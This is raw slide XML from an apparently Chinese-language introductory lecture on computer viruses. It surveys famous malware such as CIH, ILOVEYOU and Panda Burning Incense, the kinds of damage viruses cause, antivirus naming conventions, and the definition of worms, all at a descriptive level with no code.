                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CIH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：破坏计算机系统硬件 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最浪漫的病毒--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>I LOVE U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最漂亮的病毒--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>图片病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：把病毒和图片捆绑</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最虔诚的病毒--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>熊猫烧香</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：为了炫耀自己而产生</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最烦人的病毒--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>即时在线聊天病毒</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最佳创意的病毒--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AV终结者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：颠覆了反病毒(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Anti-Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)技术，屏蔽掉所有的有关杀毒软件，破坏系统安全模式、植入木马下载器的病毒</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最流氓的病毒--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>灰鸽子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：远程控制程序：摄像头、键盘、桌面等</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最坚强的病毒--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网页病毒</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>最佳国产病毒--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CIH，AV终结者</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最牛的病毒--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>未来的病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：计算机技术在发展，病毒技术也在发展</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346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计算机病毒破坏行为</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310005" y="781685"/>
            <a:ext cx="10611485" cy="5571490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="533400" indent="-533400" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>计算机病毒主要有下面几种破坏行为： </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>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破坏系统数据，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>包括破坏硬盘主引导区、引导扇区、文件分配表、破坏硬盘数据等。</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破坏目录</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文件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>删除文件、将文件改名、修改文件内容/属性、丢失文件簇等。</a:t>
            </a:r>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修改内存，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不断蚕食大量的内存，或者禁止系统分配内存，导致一些大的程序无法正常加载运行，甚至引起内存分配混乱让系统死机。</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干扰系统运行，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对用户的命令不予执行、显示干扰信息、打不开文件、胡乱操作、修改系统时间、重启动系统、系统死机等</a:t>
            </a:r>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占用资源，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>反复使用一些无效的空操作来消耗CPU的资源，运行速度降低。</a:t>
            </a:r>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破坏显示，</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如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字符跌落、绕环、倒置、显示前一屏、滚屏、抖动、乱写等。</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干扰键盘操作，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对用户的键盘输入不予接受或不接受特定的键盘字符、替换用户键盘的输入，用户输入一个字符，产生两个或多个字符等。</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制造噪音，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>控制PC喇叭，发出各种各样的声音</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0"/>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修改</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CMOS</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参数，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使得计算机无法正常启动。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-443230" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>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影响打印机，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>向打印机输出杂乱的字符，使得打印机打出无用数据。</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737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计算机病毒的命名规则</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1927860" y="1611630"/>
            <a:ext cx="9810115" cy="4892675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>反病毒公司</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>把所有恶意程序都归为病毒，为了方便管理，会按照病毒的特性，将病毒进行分类命名。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>病毒命名一般格式为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;病毒前缀&gt;.&lt;病毒名&gt;.&lt;病毒后缀&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>病毒前缀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是指一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>病毒的种类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，他是用来区别病毒的种族分类的，比如我们常见的木马病毒的前缀 Trojan ，蠕虫病毒的前缀是 Worm。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>病毒名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是指一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>病毒的家族特征</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，是用来区别和标识病毒家族的，如以前的CIH病毒的家族名都是统一的“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> CIH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ”，振荡波蠕虫病毒的家族名是“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sasser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>病毒后缀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是指一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>病毒的变种特征</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，是用来区别具体某个家族病毒的某个变种的。一般都采用英文中的26个字母来表示，如 Worm.Sasser.b 就是指 振荡波蠕虫病毒的变种B，因此一般称为 “振荡波B变种”或者“振荡波变种B”。如果该病毒变种非常多，可以采用数字与字母混合表示变种标识。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072005" y="781685"/>
            <a:ext cx="9360535" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Backdoor.RmtBomb.12 、Trojan.Win32.SendIP.15，在病毒报告中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>这些病毒名称你认识吗？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9420" y="2610485"/>
            <a:ext cx="10482580" cy="1353185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蠕虫（Worm）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>大爆发时代（2000~2005）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879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蠕虫</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2660" b="1" kern="10" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>的定义和内涵</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2665" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215515" y="1167765"/>
            <a:ext cx="9774555" cy="4523105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>蠕虫病毒是一种能够利用系统漏洞通过网络进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自我传播（会传染）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的恶意程序，它不需要附着在其他程序上，而是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>独立存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>明目张胆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的破坏计算机数据，并弹个窗告诉你，你电脑种病毒了。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>病毒的主要特征是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>感染正常文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>传染目标是互联网内的所有主机，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>不同程度不同范围的影响主机的使用，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>破坏</a:t>
            </a:r>
            <a:r>
